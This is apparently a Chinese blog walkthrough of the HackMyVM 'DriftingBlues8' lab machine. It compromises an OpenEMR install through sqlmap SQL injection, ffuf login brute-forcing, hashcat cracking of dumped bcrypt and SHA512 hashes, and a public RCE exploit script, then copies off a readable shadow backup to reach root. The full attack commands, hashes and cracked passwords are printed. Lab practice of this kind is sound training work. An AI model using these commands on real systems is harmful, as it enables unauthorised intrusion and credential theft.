信息收集

文章目录

  • 信息收集
  • 漏洞利用
  • 权限提升
  • 总结

还是先扫个网段找IP

nmap -sP 192.168.2.0/24


继续扫下端口服务

nmap -sC -sV -p- 192.168.2.19

只开了HTTP服务

打开就是个登录页面,八成待会又要爆破了

先扫扫目录

gobuster dir -w directory-list-2.3-medium.txt -u http://192.168.2.19/ -x txt,html,zip,php

扫到了很多东西,一个一个慢慢看

根据/admin.php这个页面知道了openEMR的版本是5.0.1.3

漏洞库查到了几个这个版本的漏洞,但是都需要用户名和密码才能使用,其中有一个未授权访问的漏洞,但是没找到怎么具体怎么用

那么再看看MSF里面能不能找到有关的利用模块,发现5.0.1有一个SQL注入

这里还发现了一个worldlist.txt,此处可能是要我们去爆破

漏洞利用

由于MSF的攻击速度实在是太慢了,似乎是打算直接把所有数据全部搞下来,我们直接上SQLMAP找指定的东西就好

那么可以直接上SQLMAP开冲了,在开冲之前先看看这个模块是怎么攻击的

cat /opt/metasploit-framework/embedded/framework/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb

可以知道攻击的URL如下,攻击参数是enc

/interface/forms/eye_mag/taskman.php?action=make_task&from_id=1&to_id=1&pid=1&doc_type=1&doc_id=1&enc=1


先测测能不能注入

sqlmap  -u  'http://192.168.2.19/interface/forms/eye_mag/taskman.php?action=make_task&from_id=1&to_id=1&pid=1&doc_type=1&doc_id=1&enc=1'  -p  enc   --random-agent

和预想中的一样,就是这个注入点

那么SQLMAP的攻击流程就不在这里多赘述了,直接把结果拿出来

sqlmap  -u  'http://192.168.2.19/interface/forms/eye_mag/taskman.php?action=make_task&from_id=1&to_id=1&pid=1&doc_type=1&doc_id=1&enc=1'  -p  enc   --random-agent -D openemr -T users_secure -C password,username --dump --batch

账号admin,密码是加密的

$2a$05$.tDgmjTxSmOz8ena6MnN3.2E049sE5jUaknc7aRqOOdQHLX61F.p.


到这里有2个思路,第一个是利用拿到的字典对admin用户进行登录爆破,第二个是对这个hash值进行爆破,我这里先说第一种,对用户进行登录爆破
这里使用到ffuf

ffuf -u "http://192.168.2.19/interface/main/main_screen.php?auth=login&site=default" \-X POST -H "Content-type: application/x-www-form-urlencoded" \-d "new_login_session_management=1&authProvider=Default&authUser=admin&clearPass=FUZZ&languageChoice=1"  \-w wordlist.txt -fs 456
解释:-X 发送包的模式 -H 加head   -d 要发的数据   -w 字典  FUZZ要爆破的地方 -fs 过滤数据包的大小 这里错误的数据包是456所以过滤

成功爆破出密码 .:.yarrak.:.31

下面说第二种方法使用hashcat爆破,首先值得关注的是这个是什么加密类型,这里给出hashcat官方的hash加密特征值表

ht%tps://hash%cat.net/wiki/doku.php?id=exa%mple_hashes 去掉%

最终bcrypt符合我们的条件

echo '$2a$05$.tDgmjTxSmOz8ena6MnN3.2E049sE5jUaknc7aRqOOdQHLX61F.p.'>keyhash
hashcat -m 3200 keyhash wordlist.txt

经过一会的等待,我们拿到了想要的结果,它是一个16进制,我们只要转换成字符串即可

解密出来的答案与我们爆破的一致

终于拿到了账号和密码,这个过程实在是不容易,知道了账号密码我们就可以上之前发现的EXP了,这里随便选一个任意代码执行

我这里选择49998这个python脚本的exp,参数介绍如下

构造如下payload,这里-U是默认安装路径,根据观察这里的路径位空,我们用/就可以了

python 49998.py -T 192.168.2.19 -P 80 -U / -u admin -p .:.yarrak.:.31

上线成功

没有sudo,看看suid权限

find / -user root -perm -4000 -print 2>/dev/null

也没有看到能够利用的点,那就再翻翻目录看看有收获没

当我看到/var/backups的时候,shadow.backup我们居然有读权限,我只能说这个Blues系列只能的就是从头爆破到尾

python3 -m http.server
wget http://192.168.2.19:8000/shadow.backup

这里root密码的特征是666,经过查找是SHA512crypt加密

这里我尝试了继续使用wordlist,但是没有爆破成功,那么只能用rouckyou.txt了,先爆破clapton

echo '$6$/eeR7/4JGbeM7nwc$hANgsvO09hCCMkV5HiWsjTTS7NMOZ4tm8/s4uzyZxLau2CSX7eEwjgcbfwcdvLV.XccVW5QuysP/9JBjMkdXT/'>clapton
hashcat -m 1800  clapton /root/tools/rockyou.txt

爆破成功,密码是dragonsblood

权限提升

再尝试一下root能不能成

echo '$6$sqBC8Bk02qmul3ER$kysvb1LR5uywwKRc/KQcmOMALcqd0NhHnU1Wbr9NRs9iz7WHwWqGkxKYRhadI3FWo3csX1BdQPHg33gwGVgMp.' >root
hashcat -m 1800  root /root/tools/rockyou.txt

跑了大概半个多小时,没跑出来,不是很想跑了,那就先看看clapton这个用户吧

su clapton

拿到第一个flag,同时目录下面有一个文件叫waytoroot

把这个文件弄下来反编译看看,没发现什么信息

此时我突然发现,根目录下还有一个wordlist,由于之前已经有了一个wordlist让我忽略了它,这个系列的主题就是爆破,我估计真的还是要爆破,把这个wordlist下载下来试一下

python3 -m http.server 4567
wget http://192.168.2.19:4567/wordlist.txt
hashcat -m 1800 root wordlist.txt

爆破出来了,真的不知道该说什么好····,从头到尾都在爆破,合理怀疑那个waytoroot是钓鱼的,或者是我太菜了,有知道waytoroot怎么用的欢迎分享一下,转换成字符串是这个.:.yarak.:.

拿下root

总结

总结:每次我打Blues的靶机,我都感觉我像是进入了各种爆破当中,从头到尾都在爆破,这套靶机有技巧性的地方就是找到SQL注入,拿到admin这个用户和hash,当然就算没有用到SQL注入,如果只是利用wordlist去猜测admin这个用户也能成功,然后就是接着用一个RCE的exp拿到webshell,拿到webshell之后就是无尽的爆破~

HackMyvm(二十)Driftingblues8系列文章持续更新相关推荐

  1. HackMyvm(二十七)Hommie,系列文章持续更新

    文章目录 每日一学 信息收集 漏洞利用 权限提升 总结 每日一学 NO.7 你了解哪些中间件 Apache Nginx IIS Tomcat JBoss Weblogic 信息收集 先来扫网段 nma ...

  2. Hexo 博客优化之博客美化系列(持续更新)

    2022-01-25 更新:博客新地址:https://www.itbob.cn/,文章距上次编辑时间较远,部分内容可能已经过时! 本文将讲述一些 Hexo 博客的美化,本文以作者 luuman 的 ...

  3. Hexo 博客优化之实用功能添加系列(持续更新)

    2022-01-25 更新:博客新地址:https://www.itbob.cn/,文章距上次编辑时间较远,部分内容可能已经过时! 本文将讲述一些 Hexo 博客实用功能的添加,本文以作者 luuma ...

  4. .NET Core on K8S 学习与实践系列文章索引 (更新至20191126)

    更新记录: -- 2019-11-26 增加Docker容器日志系列文章 近期在学习Kubernetes,基于之前做笔记的习惯,已经写了一部分文章,因此给自己立一个flag:完成这个<.NET ...

  5. .NET Core on K8S 学习与实践系列文章索引 (更新至20191116)

    更新记录: -- 2019-11-16 增加Docker容器监控系列文章 // 此外,今天是11月17日,我又老了一岁,祝我自己生日快乐! 近期在学习Kubernetes,基于之前做笔记的习惯,已经写 ...

  6. pwn学习总结(二) —— 基础知识(持续更新)

    pwn学习总结(二) -- 基础知识(持续更新) Canary PLT表&GOT表 格式化字符串漏洞 GCC编译参数 ASLR 危险函数 输入流 syscall条件 shellcode 其它 ...

  7. MVS文章持续更新中~

    多视角立体(MVS)相关文章总结 文章目录 多视角立体(MVS)相关文章总结 前言 1.MVSNet: Depth Inference for Unstructured Multi-view Ster ...

  8. 【k8s系列,持续更新中】2.1 入门k8s_跑个应用看看 (且随疾风前行,身后一许流星~~)

    [写在前面] 接触k8s有一段时间了,但是并没有很系统的撸一遍,总是哪个组件或者哪个出错了就去百度,知识并没有沉淀下来,所以打算写一下系列文章,本着好理解,全是大白话来搞定.如果哪里写的不好或者出错了 ...

  9. Android 天气APP(二十六)增加自动更新(检查版本、通知栏下载、自动安装)

    上一篇:Android 天气APP(二十五)地图天气(下)嵌套滑动布局渲染天气数据 效果图 开发流程 1.开发前言 2.上传应用到分发平台 3.版本数据请求与存储 4.检查版本更新.自定义更新提示弹窗 ...

最新文章

  1. win32 打印机api
  2. undistortPoints()函数用法总结
  3. linux终端定时器实验报告,定时器实验报告.doc
  4. Genymotion 解决虚拟镜像下载速度特别慢的问题
  5. Understand分析Kinect SDK 1.7自带例子(C++)图集一
  6. html5 拍照 清晰度,html5强大的功能(一)
  7. 手机pdf格式怎么弄_pdf怎么转html?pdf转html技能分享给你
  8. python中import文件_Python导入其他文件中的.py文件 即模块
  9. (二)GKE上MLOps的Jenkins作业和部署
  10. 程序员吐槽:组里新来一个“加班狂”,可把大家害惨了
  11. 互换元素(swap,swap_ranges)
  12. U盘安装fedora 9
  13. 北京邮电大学计算机学院考研调剂,2020考研调剂信息:北京邮电大学计算机学院招生信息...
  14. selenium操作浏览器
  15. 微信缓存dat怎么转图片_PC微信dat文件如何转换为图片?
  16. 前端程序员偷懒工具:emmet语法
  17. Android权限申请哪些需要动态申请
  18. 观众网app android,观众网手机客户端(电视节目录制报名)
  19. 关于单元测试框架GoogleTest——参考《百度文库》、大量博客
  20. 树莓派使用4g上网卡上网

热门文章

  1. 学matlab课程,MATLAB在线课程与学习资源2019版.pdf
  2. 高校教材管理系统mysql_高校教材管理系统的设计与实现(PHP,MySQL)(含录像)
  3. 实用网站软文美化编辑与网站图片链接限位代码
  4. 各省地级市数字经济数据(2011-2019年)
  5. 腾讯云轻量数据库服务简单测评
  6. ecnu-2020寒假热身-01
  7. 运维累了:该故障自愈出场了
  8. 软件测试进阶---2
  9. ftp 登陆后读取目录列表失败
  10. 主流技术之网易云换肤方案